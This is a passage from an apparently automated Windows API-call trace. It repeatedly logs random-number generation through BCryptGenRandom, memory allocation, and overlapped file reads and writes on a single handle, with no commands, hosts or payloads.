0x1fa2ed8 [0202.961] free (_Block=0x1fa91d0) [0202.961] free (_Block=0x1fa2ed8) [0202.961] free (_Block=0x1fa90b8) [0202.961] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.961] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.970] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.970] CloseHandle (hObject=0x2a8) returned 1 [0202.970] free (_Block=0x3df0008) [0202.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.977] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.977] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.977] free (_Block=0x3e305b8) [0202.977] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.977] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.977] free (_Block=0x1fa91d0) [0202.977] free (_Block=0x1fa2ed8) [0202.978] free (_Block=0x1fa90b8) [0202.978] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.978] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.987] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.987] CloseHandle (hObject=0x2a8) returned 1 [0202.987] free (_Block=0x3df0008) [0202.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.996] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0202.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0202.997] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.997] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.997] free (_Block=0x3e305b8) [0202.997] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.997] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.997] free (_Block=0x1fa91d0) [0202.997] free (_Block=0x1fa2ed8) [0202.997] free (_Block=0x1fa90b8) [0202.997] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0202.998] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.021] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x467, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.022] CloseHandle (hObject=0x2a8) returned 1 [0203.022] free (_Block=0x3df0008) [0203.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.033] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.033] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.033] free (_Block=0x3e305b8) [0203.033] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.033] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.034] free (_Block=0x1fa91d0) [0203.034] free (_Block=0x1fa2ed8) [0203.034] free (_Block=0x1fa90b8) [0203.034] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.034] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.045] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x105, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.046] CloseHandle (hObject=0x2a8) returned 1 [0203.046] free (_Block=0x3df0008) [0203.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.053] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.054] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.054] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.054] free (_Block=0x3e305b8) [0203.054] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.054] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.054] free (_Block=0x1fa91d0) [0203.054] free (_Block=0x1fa2ed8) [0203.054] free (_Block=0x1fa90b8) [0203.054] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.055] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.055] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.055] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.066] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfd, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.066] CloseHandle (hObject=0x2a8) returned 1 [0203.066] free (_Block=0x3df0008) [0203.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.095] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.095] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.095] free (_Block=0x3e305b8) [0203.095] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.095] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.096] free (_Block=0x1fa91d0) [0203.096] free (_Block=0x1fa2ed8) [0203.096] free (_Block=0x1fa90b8) [0203.096] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.096] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.097] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.109] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xcc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.110] CloseHandle (hObject=0x2a8) returned 1 [0203.110] free (_Block=0x3df0008) [0203.110] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.136] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.136] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.136] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.136] free (_Block=0x3e305b8) [0203.136] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.136] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.137] free (_Block=0x1fa91d0) [0203.137] free (_Block=0x1fa2ed8) [0203.137] free (_Block=0x1fa90b8) [0203.137] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.138] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.149] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.149] CloseHandle (hObject=0x2a8) returned 1 [0203.151] free (_Block=0x3df0008) [0203.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.157] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.158] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.158] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.158] free (_Block=0x3e305b8) [0203.158] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.158] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.158] free (_Block=0x1fa91d0) [0203.158] free (_Block=0x1fa2ed8) [0203.158] free (_Block=0x1fa90b8) [0203.158] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.159] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.168] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.168] CloseHandle (hObject=0x2a8) returned 1 [0203.168] free (_Block=0x3df0008) [0203.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.174] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.174] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.174] free (_Block=0x3e305b8) [0203.174] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.175] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.175] free (_Block=0x1fa91d0) [0203.175] free (_Block=0x1fa2ed8) [0203.175] free (_Block=0x1fa90b8) [0203.175] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.175] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.184] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x112, 